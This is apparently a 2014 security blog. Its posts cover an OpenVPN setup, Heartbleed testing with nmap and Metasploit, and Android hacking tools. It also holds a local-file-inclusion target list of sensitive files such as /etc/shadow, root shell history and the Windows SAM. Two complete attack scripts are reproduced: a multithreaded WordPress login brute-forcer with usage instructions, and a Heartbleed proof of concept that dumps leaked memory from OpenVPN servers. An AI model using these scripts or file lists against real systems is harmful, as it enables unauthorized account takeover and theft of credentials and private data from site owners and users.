Apr 26, 2014

Useful list file for Local File Inclusion

Linux + Solaris files (Darwin [Mac] systems may have a prefix of /private/)

- Fingerprinting (General files)
  • /etc/passwd
  • /etc/master.passwd
  • /etc/shadow
  • /var/db/shadow/hash
  • /etc/group
  • /etc/hosts
  • /etc/motd
  • /etc/issue
  • /etc/release
  • /etc/redhat-release
  • /etc/crontab
  • /etc/inittab
  • /proc/version
  • /proc/cmdline
  • /proc/self/environ
  • /proc/self/fd/0
  • /proc/self/fd/1
  • /proc/self/fd/2
  • /proc/self/fd/255
  • /etc/httpd.conf
  • /etc/apache2.conf
  • /etc/apache2/apache2.conf
  • /etc/apache2/httpd.conf
  • /etc/httpd/conf/httpd.conf
  • /etc/httpd/httpd.conf
  • /etc/apache2/conf/httpd.conf
  • /etc/apache/conf/httpd.conf
  • /usr/local/apache2/conf/httpd.conf
  • /usr/local/apache/conf/httpd.conf
  • /etc/apache2/sites-enabled/000-default
  • /etc/apache2/sites-available/default
  • /etc/nginx.conf
  • /etc/nginx/nginx.conf
  • /etc/nginx/sites-available/default
  • /etc/nginx/sites-enabled/default
  • /etc/ssh/sshd_config
  • /etc/my.cnf
  • /etc/mysql/my.cnf
  • /etc/php.ini
  • /var/mail/www-data
  • /var/mail/www
  • /var/mail/apache
  • /var/mail/nobody
  • /var/www/.bash_history
  • /root/.bash_history
  • /var/root/.bash_history
  • /var/root/.sh_history
- Less common paths for httpd.conf/php.ini
  • /usr/local/apache/httpd.conf
  • /usr/local/apache2/httpd.conf
  • /usr/local/httpd/conf/httpd.conf
  • /usr/local/etc/apache/conf/httpd.conf
  • /usr/local/etc/apache2/conf/httpd.conf
  • /usr/local/etc/httpd/conf/httpd.conf
  • /usr/apache2/conf/httpd.conf
  • /usr/apache/conf/httpd.conf
  • /etc/http/conf/httpd.conf
  • /etc/http/httpd.conf
  • /opt/apache/conf/httpd.conf
  • /opt/apache2/conf/httpd.conf
  • /var/www/conf/httpd.conf
  • /usr/local/php/httpd.conf
  • /usr/local/php4/httpd.conf
  • /usr/local/php5/httpd.conf
  • /etc/httpd/php.ini
  • /usr/lib/php.ini
  • /usr/lib/php/php.ini
  • /usr/local/etc/php.ini
  • /usr/local/lib/php.ini
  • /usr/local/php/lib/php.ini
  • /usr/local/php4/lib/php.ini
  • /usr/local/php5/lib/php.ini
  • /usr/local/apache/conf/php.ini
  • /etc/php4/apache/php.ini
  • /etc/php4/apache2/php.ini
  • /etc/php5/apache/php.ini
  • /etc/php5/apache2/php.ini
  • /etc/php/php.ini
  • /etc/php/php4/php.ini
  • /etc/php/apache/php.ini
  • /etc/php/apache2/php.ini
  • /usr/local/Zend/etc/php.ini
  • /opt/xampp/etc/php.ini
  • /var/local/www/conf/php.ini
  • /etc/php/cgi/php.ini
  • /etc/php4/cgi/php.ini
  • /etc/php5/cgi/php.ini
- OS Logs
 Linux
  • /var/log/lastlog
  • /var/log/wtmp
  • /var/run/utmp
  • /var/log/messages.log
  • /var/log/messages
  • /var/log/messages.0
  • /var/log/messages.0.gz
  • /var/log/messages.1
  • /var/log/messages.1.gz
  • /var/log/messages.2
  • /var/log/messages.2.gz
  • /var/log/messages.3
  • /var/log/messages.3.gz
  • /var/log/syslog.log
  • /var/log/syslog
  • /var/log/syslog.0
  • /var/log/syslog.0.gz
  • /var/log/syslog.1
  • /var/log/syslog.1.gz
  • /var/log/syslog.2
  • /var/log/syslog.2.gz
  • /var/log/syslog.3
  • /var/log/syslog.3.gz
  • /var/log/auth.log
  • /var/log/auth.log.0
  • /var/log/auth.log.0.gz
  • /var/log/auth.log.1
  • /var/log/auth.log.1.gz
  • /var/log/auth.log.2
  • /var/log/auth.log.2.gz
  • /var/log/auth.log.3
  • /var/log/auth.log.3.gz
 Solaris
  • /var/log/authlog
  • /var/log/syslog
  • /var/adm/lastlog
  • /var/adm/messages
  • /var/adm/messages.0
  • /var/adm/messages.1
  • /var/adm/messages.2
  • /var/adm/messages.3
  • /var/adm/utmpx
  • /var/adm/wtmpx
 Mac
  • /var/log/kernel.log
  • /var/log/secure.log
  • /var/log/mail.log
  • /var/run/utmp
  • /var/log/wtmp
  • /var/log/lastlog
- HTTPD Logs
  • /var/log/access.log
  • /var/log/access_log
  • /var/log/error.log
  • /var/log/error_log
  • /var/log/apache2/access.log
  • /var/log/apache2/access_log
  • /var/log/apache2/error.log
  • /var/log/apache2/error_log
  • /var/log/apache/access.log
  • /var/log/apache/access_log
  • /var/log/apache/error.log
  • /var/log/apache/error_log
  • /var/log/httpd/access.log
  • /var/log/httpd/access_log
  • /var/log/httpd/error.log
  • /var/log/httpd/error_log
  • /etc/httpd/logs/access.log
  • /etc/httpd/logs/access_log
  • /etc/httpd/logs/error.log
  • /etc/httpd/logs/error_log
  • /usr/local/apache/logs/access.log
  • /usr/local/apache/logs/access_log
  • /usr/local/apache/logs/error.log
  • /usr/local/apache/logs/error_log
  • /usr/local/apache2/logs/access.log
  • /usr/local/apache2/logs/access_log
  • /usr/local/apache2/logs/error.log
  • /usr/local/apache2/logs/error_log
  • /var/www/logs/access.log
  • /var/www/logs/access_log
  • /var/www/logs/error.log
  • /var/www/logs/error_log
  • /opt/lampp/logs/access.log
  • /opt/lampp/logs/access_log
  • /opt/lampp/logs/error.log
  • /opt/lampp/logs/error_log
  • /opt/xampp/logs/access.log
  • /opt/xampp/logs/access_log
  • /opt/xampp/logs/error.log
  • /opt/xampp/logs/error_log
- PHP Session Locations
  • /tmp/sess_<sessid>
  • /var/lib/php/session/sess_<sessid>
  • /var/lib/php5/session/sess_<sessid>
Windows files
- Fingerprinting
  • *:\boot.ini
  • *:\WINDOWS\win.ini
  • *:\WINNT\win.ini
  • *:\WINDOWS\Repair\SAM
  • *:\WINDOWS\php.ini
  • *:\WINNT\php.ini
  • *:\Program Files\Apache Group\Apache\conf\httpd.conf
  • *:\Program Files\Apache Group\Apache2\conf\httpd.conf
  • *:\Program Files\xampp\apache\conf\httpd.conf
  • *:\php\php.ini
  • *:\php5\php.ini
  • *:\php4\php.ini
  • *:\apache\php\php.ini
  • *:\xampp\apache\bin\php.ini
  • *:\home2\bin\stable\apache\php.ini
  • *:\home\bin\stable\apache\php.ini
- Logs
  • *:\Program Files\Apache Group\Apache\logs\access.log
  • *:\Program Files\Apache Group\Apache\logs\error.log
- PHP Session Locations
  • *:\WINDOWS\TEMP\
  • *:\php\sessions\
  • *:\php5\sessions\
  • *:\php4\sessions\


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Best 6 for learning about Kali

1. Kali Linux by Beginner Hacking - blog

A part of beginners hacking blog, the post is a complete and well explained guide atleast for beginners. So if you have just installed Kali Linux and willing to learn the basics, here's where you should head.

2. Hack with Kali Linux - blog

This is one blog that is completely dedicated to Kali Linux. The blog provides everything from hacker's news to hacker's tools to tutorial and hence is 'the' place to visit for both new and pro Kali users.

3. Web Penetration Testing with Kali Linux - eBook

Web Penetration Testing with Kali Linux is designed to be a guide for professional Penetration Testers looking to include Kali in a web application penetration engagement.

4. Kali Linux Cookbook - eBook

Kali Linux Cookbook will serve as an excellent source of information for the security professional and novice alike. The book offers detailed descriptions and example recipes that allow you to quickly get up to speed on both Kali Linux and its usage in the penetration testing field.

5. Introduction to Kali Linux – Official Documentation

This is the Official Kali Linux Documentation, that serves as a complete guide to understand and comprehend Kali Linux and its features.

6. Introduction to Kali - The Linux Operating System Built for Hacking - Video

If a picture says a thousand words, then we wonder how many a video will say! Well, jokes apart this is YouTube video by Eli the computer guy and is an awesome tutorial for Kali Linux. Although the tutorial does require you to have a strong foundation of Linux, networking and computer systems.


Source: http://efytimes.com/e1/fullnews.asp?edid=121888 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Apr 23, 2014

Howto: Setup openvpn server on Ubuntu-12.04

1. Install openvpn and openssl
apt-get update apt-get install openvpn openssl vim

2. Copy default config from /usr/share/doc/openvpn/examples/easy-rsa/2.0/ to /etc/openvpn/easy-rsa
cd /etc/openvpn
cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0 ./easy-rsa

3. Edit /etc/openvpn/easy-rsa/vars
Change from
export EASY_RSA="`pwd`"
to

export EASY_RSA="/etc/openvpn/easy-rsa"

4. Go to /etc/openvpn/easy-rsa and run this command
. ./vars

5. Clear keys
./clean-all

6. Create config openssl.cnf from openssl-1.0.0.cnf
cp openssl-1.0.0.cnf openssl.cnf

7. Build key for openvpn
./build-ca OpenVPN
./build-key-server server
./build-key client1
./build-dh

8. Create openvpn.conf in /etc/openvpn/ with this content.
dev tun
proto udp
port 1194
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh1024.pem
user nobody
group nogroup
server 10.10.10.0 255.255.255.0
persist-key
persist-tun
status /var/log/openvpn-status.log
verb 3
client-to-client
push "redirect-gateway def1"
#set the dns servers
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
log-append /var/log/openvpn
comp-lzo


9. Enable ip forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

10. Create iptable rule for forwarding packet(eth0 is my network name, you must change to your network interface, 10.211.55.25 is my ip of eth0 interface)
iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -o eth0 -j SNAT --to 10.211.55.25

11. Start openvpn server
/etc/init.d/start

12. Create configure file for client and copy client1 key file that create in step#7.


dev tun
client
proto udp
remote 10.211.55.25 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
comp-lzo
verb 3

13. Run openvpn client
openvpn client.conf
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Create lab for testing Heartbleed

First, you must use Ubuntu12.04 for this tutorial.

1. Install apache2, openssl
$ apt-get install apache2, openssl

2. Enable https website
$ a2enmod ssl
$ a2ensite default-ssl

3. Download test script from http://www.aldeid.com/wiki/CVE-2014-016-Heartbleed-Vulnerability

4. Test script to your website or openvpn server. 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Check LibSSL for Heartbleed

When you upgrade Ubuntu12.04 with install openssl, it's not guarantee that you have fix the Heartbleed vulnerability. You must install libssl1.0.0 too. By the way, if you want to check OpenSSL version from libssl library, please use this command.

strings /lib/x86_64-linux-gnu/libssl.so.1.0.0 | grep OpenSSL
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Apr 22, 2014

Howto: Convert nmap xml file to csv file

I got the script from http://blog.didierstevens.com/2014/04/16/nmap-grepable-script-output-heartbleed/ and it work perfectly. So I want to write this blog for tell how it work.

1. Using nmap scans
$ nmap -p443 -sV --script=ssl-heartbleed  target -oX test-heartbleed.xml

2.  Download script from the source,(http://didierstevens.com/files/software/nmap-xml-script-output_V0_0_1.zip)

3. Unzip file
$ unzip nmap-xml-script-output_V0_0_1.zip

4. Change permission for executing
chmod +x nmap-xml-script-output.py

5. Run it with the output that you got from #2
./nmap-xml-script-output.py -o test-heartbleed.csv -s "," test-heartbleed.xml

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Multithread wordpress brute forcing tool with python

    #!/usr/bin/python
    # Video: http://youtu.be/mURnM-Yp72g
    # Coded By: xSecurity
     
    import urllib, urllib2, os, sys, requests as xsec, re
    from time import sleep
    from threading import Thread
    def cls():
        linux = 'clear'
        windows = 'cls'
        os.system([linux,windows][os.name == 'nt'])
    cls()
    print '''
          __                      _ _        
    __  __/ _\ ___  ___ _   _ _ __(_) |_ _   _
    \ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
    >  < _\ \ __/ (__| |_| | |  | | |_| |_| |
    /_/\_\\__/\___|\___|\__,_ |_|  |_|\__|\__, |
                                        |___/WordPress Brute Muliththreading :)
    #Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
    #Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin
    Special For My Lov3r Cyber-Crystal
    #Usage: Python wp.py http://target.com/ admin pass.txt
    #Note: U Need Install Requests Package: http://www.youtube.com/watch?v=Ng5T18HyA-Q'''
     
    xsec = xsec.session()
    def brute(target,usr,pwd):
        get = xsec.get(target+'/wp-admin/')
        post = {}
        post["log"] = usr
        post["pwd"] = pwd
        post["wp-submit"] = "Log+in"
        post["redirect_to"] = target
        post["testcookie"] = "1"
        get2 = xsec.post(target+'/wp-login.php' , data=urllib.urlencode(post))
        get3 = xsec.get(target+'/wp-admin')
        if '<li id="wp-admin-bar-logout">' in get3.text:
            print '[+] Cracked Username: '+usr+' & Password: '+pwd
            os._exit(1)
        else:
            print '[~] Trying ...: '+pwd
     
    if len(sys.argv) >= 3:
        target = sys.argv[1]
        usr = sys.argv[2]
        lst = open(sys.argv[3]).read().split("\n")
        print '[*]Target: '+target
        print '[*]LIST:',len(lst)
        print '[*]Username: '+usr
        thrdlst = []
        for pwd in lst:
            t = Thread(target=brute, args=(target,usr,pwd))
            t.start()
            thrdlst.append(t)
            sleep(0.009)
        for b in thrdlst:
            b.join()
    else:
        print '[>]There Somthing Missing Check ARGVS :)'

Source: http://pastebin.com/4BV4Kj0a

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Heartbleed Vulnerability in VPN

#!/usr/bin/env python2
# Quick and dirty demonstration of CVE-2014-0160 on OpenVPN
# by Stefan Agner (stefan@agner.ch)
# based on work of Jared Stafford and Yonathan Klijnsma
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
target = None
# OpenVPN Session ID
lsesseionid = 0x12345678
packetid = 0
options = OptionParser(usage='%prog server [options]', description='Test for TLS heartbeat vulnerability on OpenVPN Server (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=1194, help='Port to test (default: 1194)')
def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')
hello_openvpn = h2bin('''
16 03 01 00 df 01 00 00 db 03 01 95 a3 8a 7f 46
a9 1c 78 99 21 ae 92 6d 2d 14 5a 8f 2b c8 ee e2
0b 9e 38 34 ec 3d 66 2b 9c d5 63 00 00 68 c0 14
c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f
c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16
00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e
00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04
00 2f 00 96 00 41 00 07 c0 11 c0 07 c0 0c c0 02
00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08
00 06 00 03 00 ff 02 01 00 00 49 00 0b 00 04 03
00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00
0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00
06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00
01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00
0f 00 01 01
''')
# Get OpenVPN header...
def msg_hdr(hdr):
    if hdr is None:
        return None, None, None
    typ, sessionid, packarrlen = struct.unpack('>bQb', hdr)
    #print "Typ %d, SessionID %d, Packet-ID array length %d" % (typ, sessionid, packarrlen)
    return typ, sessionid, packarrlen
def msg_tls_heartbeat_header(data):
    typ, ver, length = struct.unpack('>bhh', data[0:5])
    return typ, ver, length
def msg_tls_heartbeat_request(payload, hb_length=0x4000):
    return struct.pack('>bhhbh{0}s'.format(len(payload)), 24, 0x0301, len(payload) + 3, 1, hb_length, payload)
 
def check_hb(typ, ver, pay_length):
    if typ == 24:
        if pay_length > 3:
            print target + '|VULNERABLE'
        else:
            print target + '|NOT VULNERABLE'
        return True
    if typ == 21:
        print target + '|NOT VULNERABLE'
        return False
    print target + '|NOT VULNERABLE'
    return False
def msg_id(data):
    packid, = struct.unpack('>i', data)
    return packid
def msg_pack(data):
    # Packet ID...
    return
def hexdump(src, length=8):
    result = []
    digits = 4 if isinstance(src, unicode) else 2
    for i in xrange(0, len(src), length):
       s = src[i:i+length]
       hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s])
       text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
       result.append( b"%04X %-*s %s" % (i, length*(digits + 1), hexa, text) )
    return b'\n'.join(result)
def send_message(s, data):
    global packetid
    start = 0
    length = 0
    cnt = 0
    bytes_remaining = len(data)
    while bytes_remaining > 0:
        if bytes_remaining > 100:
            length = 100
        else:
            length = bytes_remaining
        s.send(struct.pack('>bQbi{0}s'.format(length), 0x20, lsesseionid, 0, packetid, data[start:start+length]))
        sys.stdout.flush()
        packetid += 1
        cnt += 1
        bytes_remaining -= length
        start += length
    return cnt
def handle_message(s):
    global lsesseionid
    data = s.recv(1024)
    pos = 10
    typ, sessionid, packarrlen = msg_hdr(data[0:pos])
    if packarrlen > 0:
        pos = 10 + packarrlen * 4
        msg_pack(data[10:pos])
        # Remote-SessionID
        pos += 8
    if typ == 0x28:
        #print "Ack received"
        return typ, sessionid, packarrlen, None, None
    # Send ACK..
    packid = msg_id(data[pos:pos+4])
    s.send(struct.pack('>bQbiQ', 0x28, lsesseionid, 1, packid, sessionid))
    if typ == 0x20:
        #print "Control Message received"
        return typ, sessionid, packarrlen, packid, data[pos+4:]
    return typ, sessionid, packarrlen, packid, None
def main():
    global target
    global lsesseionid
    global packetid
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
    target = args[0]
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sys.stdout.flush()
    s.connect((target, opts.port))
    sys.stdout.flush()
    s.send(struct.pack('>bqbi', 0x38, lsesseionid, 0, packetid))
    packetid += 1
    typ, sessionid, packarrlen, packid, payload = handle_message(s)
    send_message(s, hello_openvpn)
    while True:
        typ, sessionid, packarrlen, packid, payload = handle_message(s)
        # Look for server hello done message.
        if typ == 0x20 and len(payload) < 100:
            break
        if typ == None:
            print "Hello message failed"
            return
    hb_length = 0x1000
    hb = msg_tls_heartbeat_request("Heartbleed test payload", hb_length)
    send_message(s, hb)
    hb_received = False
    heartbleed = ""
    other = 0
    # Heartbeat delivered, if vulnerable, we receive data...
    while True:
        typ, sessionid, packarrlen, packid, payload = handle_message(s)
        if typ == 0x20:
            # Control message, should contain heartbeat answer...
            heartbleed += payload
            if not hb_received:
                # Check HB header early...
                hb_received = True
                tlstype, tlsversion, tlslength = msg_tls_heartbeat_header(payload)
                check_hb(tlstype, tlsversion, tlslength)
        elif typ == 0x28:
            # We received ack only, the server ignored our heartbeat
            print target + '|NOT VULNERABLE (only ACK received)'
            return
        if len(heartbleed) >= hb_length + 5:
            break
    print hexdump(heartbleed[0:100], 16)
if __name__ == '__main__':
    main()
 
 




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Apr 21, 2014

Howto: Test Heartbleed with Nmap or Metasploit in Kali

Nmap
1. Update nmap & nse
$ apt-get install nmap
$ nmap --script-updatedb
(Or you can download ssl-heartbleed.nse from https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse, and tls.lua from http://nmap.org/svn/nselib/tls.lua. Save tls.lua to /usr/share/nmap/nselib and ssl-heartbleed.nse to /usr/share/nmap/scripts/)

2.  Using nmap scan with heartbleed script.
$ nmap -sV --script=ssl-heartbleed --script-args vulns.showall target
Options summary:
  • -d turns on debugging output, helpful for seeing problems with the script.
  • --script ssl-heartbleed selects the ssl-heartbleed script to run on appropriate ports.
  • --script-args vulns.showall tells the script to output "NOT VULNERABLE" when it does not detect the vulnerability.
  • -sV requests a service version detection scan, which will allow the script to run against unusual ports that support SSL.
  • --script-trace shows a packet dump of all script-related traffic, which may show memory dumps from the Heartbleed bug.
  • -p 443 limits the script to port 443, but use caution! Even services like SMTP, FTP, and IMAP can be vulnerable.
  • -oA heartbleed-%y%m%d saves Nmap's output in 3 formats as heartbleed-20140410.nmap, heartbleed-20140410.xml, and heartbleed-20140410.gnmap.


Metasploit
1. Update your metasploit
$ msfupdate

2. Get your msfconsole
$ msfconsole

3. Use auxiliary/scanner/ssl/openssl_heartbleed module and set RHOSTS to target host. And run
msf> use auxiliary/scanner/ssl/openssl_heartbleed
msf> set RHOSTS 
msf> run



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Apr 20, 2014

Tools: 10 Hacking Tools Of Android

1.Hackode

Hackode : The hacker's Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

2.androrat

Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

3.APKInspector

APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualise compiled Android packages and their corresponding DEX code.

4.DroidBox

DroidBox is developed to offer dynamic analysis of Android applications.

5.Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

6.zANTI

zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

7.Droid Sheep

DroidSheep can be easily used by anybody who has an Android device and only the provider of the webservice can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the webservice.

8.dSploit

dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device.

9.AppUse – Android Pentest Platform Unified Standalone Environment

AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs.

10.Shark for Root

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.  


Source: http://www.efytimes.com/e1/fullnews.asp?edid=136275


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |